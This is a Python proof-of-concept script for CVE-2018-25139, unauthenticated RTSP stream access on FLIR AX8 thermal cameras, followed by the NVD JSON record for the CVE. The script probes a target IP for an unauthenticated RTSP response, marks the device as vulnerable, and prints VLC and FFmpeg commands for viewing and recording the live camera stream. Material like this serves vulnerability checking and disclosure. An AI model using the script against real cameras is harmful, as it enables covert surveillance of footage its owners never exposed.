CVE-2018-25139

# CVE-2018-25139 PoC - FLIR AX8 Unauthenticated RTSP Stream Access # Affected: FLIR AX8 Thermal Camera Firmware <= 1.32.16 import socket import sys def check_rtsp_unauthenticated(target_ip, port=554): """ Check if FLIR AX8 RTSP service allows unauthenticated access """ # RTSP OPTIONS request without authentication rtsp_request = f"OPTIONS rtsp://{target_ip}:{port}/live RTSP/1.0\r\n" rtsp_request += "CSeq: 1\r\n" rtsp_request += "User-Agent: PoC-CVE-2018-25139\r\n" rtsp_request += "\r\n" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, port)) sock.send(rtsp_request.encode()) response = sock.recv(4096).decode('utf-8', errors='ignore') sock.close() if "RTSP/1.0 200 OK" in response: print(f"[+] VULNERABLE: {target_ip} allows unauthenticated RTSP access") return True else: print(f"[-] NOT VULNERABLE or service unavailable") return False except Exception as e: print(f"[-] Error: {e}") return False def get_rtsp_stream_ffmpeg(target_ip, port=554): """ Use FFmpeg to access unauthenticated RTSP stream Command: ffmpeg -i rtsp://TARGET_IP:554/live -c copy output.mp4 """ stream_url = f"rtsp://{target_ip}:{port}/live" print(f"[+] Stream URL: {stream_url}") print(f"[+] Use VLC: vlc \"{stream_url}\"") print(f"[+] Use FFmpeg: ffmpeg -i \"{stream_url}\" -c copy output.mp4") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2018-25139.py <target_ip>") sys.exit(1) target = sys.argv[1] check_rtsp_unauthenticated(target) get_rtsp_stream_ffmpeg(target)

{"cve": {"id": "CVE-2018-25139", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:47.957", "lastModified": "2025-12-31T18:40:36.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FLIR AX8 Thermal Camera 1.32.16 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly connect to the RTSP stream using tools like VLC or FFmpeg to view and record thermal camera footage."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:flir:flir_ax8_firmware:1.32.16:*:*:*:*:*:*:*", "matchCriteriaId": "F3C30C40-7473-4F2F-AEB7-5DD3C96A6186"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A4DACB7-0558-4C74-8EDB-39591236ADEE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:flir:flir_ax8_firmware:1.17.13:*:*:*:*:*:*:*", "matchCriteriaId": "82BDB498-9003-4C74-B197-914D35D0EEBE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A4DACB7-0558-4C74-8EDB-39591236ADEE"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/45606", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.flir.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/45606", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}